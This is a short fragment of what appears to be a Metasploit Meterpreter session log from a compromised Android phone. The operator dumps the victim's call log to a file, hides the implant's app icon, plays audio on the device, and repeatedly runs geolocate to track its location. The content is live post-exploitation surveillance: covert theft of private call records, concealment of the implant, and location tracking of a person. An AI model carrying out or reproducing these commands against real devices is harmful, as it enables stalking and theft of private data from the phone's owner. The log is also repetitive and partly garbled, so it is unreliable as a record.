 2019-06-09 13:59:28 +0000
meterpreter > dump_calllog -o /root/django/users/admin/dumpcalllog.txt
meterpreter > hide_app_icon
meterpreter > geolocate
[*] Playing /root/a.mp3...
meterpreter > geolocate
meterpreter > geolocate
[*] Playing ....
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
meterpreter > geolocate
